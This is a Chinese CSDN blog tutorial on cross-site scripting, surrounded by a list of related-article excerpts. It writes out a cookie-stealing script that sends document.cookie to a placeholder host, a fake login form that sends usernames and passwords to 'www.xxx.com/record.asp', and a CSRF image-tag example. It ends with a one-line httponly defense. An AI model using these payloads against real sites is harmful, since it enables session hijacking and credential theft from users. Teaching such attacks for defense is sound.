XSS漏洞(一)

最新推荐文章于 2024-06-03 08:26:45 发布
最新推荐文章于 2024-06-03 08:26:45 发布
阅读量239 收藏
点赞数 2
分类专栏: WEB 文章标签: xss 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/misaka10046/article/details/118318926
版权

XSS的原理

通过XSS使用户浏览器运行恶意脚本,使用户在打开这个页面时,浏览器自动的去运行这个脚本。
可以起到窃取用户cookie,以及模拟GST,POST请求来操作用户浏览器。

XSS的运用

窃取Cookie

在对用户输入数据没有过滤时,web服务器会把用户输入数据直接返回给客户端。正常情况为www.xxx.com/xx.php?input=123如果要去窃取Cookie的话就可以使用一段JS代码对用户输入进行修改www.xxx.com/xx.php?input=<script>location.href='www.xxx.com/post?cookie'+document.cookie;</script>这样当用户点击这个网址的时候,会把自己的cookie发送出来。

构造一个钓鱼界面

<script>
function hack(){
	location.replace("http://www.xxx.com/record.asp?username="+document.forms[0].user.value+"password="+document.forms[0].pass.value);
}
</script>
<form>
<br><br>username<br>
<input type ="text" id ="user" name="user">
<br>password<br>
<input type="password" name="pass">
<br><input type="submit" name =login value='login' onclick ="hack()">
</form>

构造一个与原网页一模一样的网页,再对提交的地方插入一段JS代码,在提交的时候先向黑客那一端发送自己的用户名和密码。

跨站请求伪造

多会把请求伪装为图片,来诱导你去点击,点击之后就会利用你的权限去执行一系列的指令
<iimg src = http://www.xxx.com/xx.php?+构造的执行的指令>

注入恶意软件

攻击者可以在其他页面上放置一些恶意软件,用XSS注入的方式插入一段调用这个页面的脚本,当用户浏览器执行这段脚本使,就自动访问了恶意软件的页面

XSS的防御

1.给Cookie设置为httonly,这样就没办法通过XSS来获取Cookie了 setcookie("123","123",NULL,NULL,NULL,NULL,TRUE);最后一位设置为true

0xwangliang
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
post攻击 xxs_XSS(跨站脚本攻击)详解
weixin_33289873的博客
01-28 1181
目录XSS的原理和分类跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击!XSS分为:存储型 、...
实验26:post方式下的xss漏洞利用
qq_44720671的博客
04-17 1758
我们来到pikachu靶场的xss post请求页面 我们随便提交一个字段 请求方式是以post方式发送的,我们无法把恶意代码嵌入进URL里面 我们还是首先来整理一下思路 这里面下面的三角已经讲过 是一样的,但是上面多出了一个攻击者需要自己伪造的表单,攻击者就可以把这个链接发送给用户,这样就达到了让用户自己去提交一个post的一个目的 这就是那个表单,它的作用就是会让页面自动的去提交一个...
JSP使用过滤器防止Xss漏洞
10-17
主要为大家详细介绍了JSP使用过滤器防止Xss漏洞,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
跨站脚本攻击(XSS)详解
Karka_的博客
01-02 1022
XSS(Cross Site Script)攻击,通常指黑客通过"HTML注入"篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。一开始,这种攻击的演示案例是跨域的,所以叫做"跨站脚本"。现在是否跨域已经不再重要,但是名字一直沿用下来。XSS长期以来被列为客户端Web安全中的头号大敌。因为XSS破坏力强大,且产生的场景复杂,难以一次性解决。下面举个XSS的例子php?如果用户提交了一段HTML代码alert(/xss/)就会在页面中执行,弹出框显示/xss/。
post攻击 xxs_如何拦截post请求xss攻击
weixin_42298093的博客
01-28 1216
publicclassXssHttpServletRequestWrapperextendsHttpServletRequestWrapper{//白名单数组privatestaticfinalString[]WHITE_LIST={"content"};//定义script的正则表达式privatestaticfinalStringREGEX_SCRIPT="...
java http url xss_在XSS测试中用JAVA模拟POST请求
weixin_32818781的博客
02-26 193
该场景应用在XSS测试,这个过程我们针对某一特定的请求,进行测试importjava.io.BufferedReader;importjava.io.BufferedWriter;importjava.io.IOException;importjava.io.InputStreamReader;importjava.io.OutputStreamWriter;importjava.io...
XSS漏洞利用方式分析
m0_65096687的博客
10-09 259
通过修改页面的DOM节点形成的XSS,效果跟反射型XSS类似,攻击者在URL中插入XSS代码,前端页面直接从URL中获取XSS代码并且输出到页面,导致XSS代码的执行,攻击者将带有XSS代码的URL发给用户,用户打开后受到XSS攻击。反射型XSS也叫做非持久型XSS,攻击者在URL中插入XSS代码,服务端将URL中的XSS代码输出到页面上,攻击者将带有XSS代码的URL发送给用户,攻击者在页面上插入XSS代码,服务器端将数据存入数据库,当用户访问到存在XSS漏洞的页面时。小于号(
3-6POST方式下的XSS漏洞
山兔的博客
04-23 1761
这边有个靶场,我们直接登录一下,这边的提交以post方式提交 我们可以看到,他并没有在url里面来传这个参数,我们看一下抓包 我们可以看到message是通过post方式传到后台的,这种情况下,我们没有办法把我们的恶意代码嵌入到url里面,发送给目标 POSTXSS的利用:cookie获取 在post方式下,我们没有办法发送url,让客户去帮我们提交表单,我们首先可以自己搭一个恶意站点,然后在里面写一个post表单,我们可以把这个表单的链接,发送给用户,让他去点击,他一旦访问post页面,这个页面,
百度编辑器解决xss漏洞
03-01
百度编辑器解决xss漏洞
DedeCMS 存储型xss漏洞1
08-03
Dedecms会员功能shops_delivery.php中的 des 参数存在存储型XSS漏洞,攻击者可利用漏洞获得用户测试环境:DedeCMS-V5.7-U
SQL+XSS漏洞修复方案
04-13
近期公司的项目遭受了SQL+XSS攻击(市面上现在检测工具很多如:AWVS/360等),现贴出项目中的修复核心代码,需要的可以参考一下
post方式下的XSS漏洞应用
weixin_44749329的博客
05-19 6072
post方式下的XSS漏洞应用 下面来演示一下pos方式下的XSS漏洞 首先来打开一下post型的XSS 2.直接登录一下一个案例,跟反射型的XSS是一样的,只过是这个地方的提交方式是以post的方式提交的 提交一个参数,我们可以发现其实它并没有在UIL里面穿这个参数 我们可以看一下抓包,在burpsuit里message是直接通过请求体通过post方式传到后台的,虽然这个地方也存在xss...
ctf xss利用_图片xss的利用方法
weixin_28881575的博客
02-23 803
在使用类似ueditor这样的网页编辑器时,由于编辑器本身支持的源码编辑功能,如果过滤的不够完善,攻击者可以通过写入js来执行脚本语句,达成存储型xss的效果。当然,如今的编辑器安全方面做的都已经相当不错,能够自动触发的恶意脚本已经是很难写入了,剩下还比较容易受控的,就是点击触发的外部链接了。前段时间,我就在尝试利用了外部链接进行csrf时,小伙伴提醒我可以尝试一下图片xss的方法,该方法和恶意外...
图片XSS
不忘初心,护天下安全!
10-07 1906
参见:https://woj.app/1785.html
XSS 注入漏洞处理
布袋和尚
04-29 1127
今年是进入网络安全行业第1年,之前总是道听途说各种漏洞,不以为然。。前一阵子才切身体会到了漏洞,嗯,也是自己造成的,就是XSS注入漏洞。 该漏洞的意思是攻击者往 Web 页面里插入恶意 Script 代码,当用户浏览该页之时,嵌入其中 Web 里面的 Script 代码会被执行,从而达到恶意攻击用户的目的。 常见的场景是在网页中提交一些文本,如果文本如下: <script>alert(“1”)</script > 提交之后,网页会弹出对话框,显示“1”。 解决这个问题的办
XSS 跨站脚本漏洞总结(知识点+实例)
叶子的Blog
10-24 1743
XSS 简介 XSS,全称Cross Site Scripting,即跨站脚本攻击,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据攻击代码的工作方式,XSS可以分为反射型的XSS、存储型的XSS和DOM型的XSS。 反射型 反射型的XSS是非持久化的,攻击者事先制作好攻击链接,需要
XSS漏洞文章总结
王嘟嘟的博客
09-20 993
0x00 前言 对xss漏洞的一个总结 0x01 内容 1.xss漏洞说明 https://blog.csdn.net/qq_36869808/article/details/82787932
JS加密解密/XSS的防御
最新发布
mxd01848的博客
06-03 993
总之,防御 XSS 攻击需要从多个角度进行考虑和处理,包括输入过滤、输出编码以及使用可靠的安全库和框架。通过多层次的防御策略,可以有效地提高应用程序的安全性。这段代码的目的是对用户输入进行过滤,以防止跨站脚本(XSS)攻击。让我们详细拆解这段代码,并分析其工作原理和有效性。怎么隐藏你的xss保护逻辑呢,使用在线js加解密工具对代码进行保护。是一个用于过滤 XSS 攻击的函数。函数进行过滤,然后返回过滤后的结果。进行解码,并将其传递给。最终返回过滤后的字符串。,表示需要过滤的输入。,则不进行后续操作。
xss网站寻找xss漏洞
08-29
中提供了一个示例URL,你可以通过访问该网站来进行XSS漏洞的挖掘。在验证漏洞的过程中,要注意不要使用谷歌内核的浏览器,因为谷歌内核浏览器自带XSS筛选器,这可能会导致无法复现网站上的反射型XSS漏洞。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值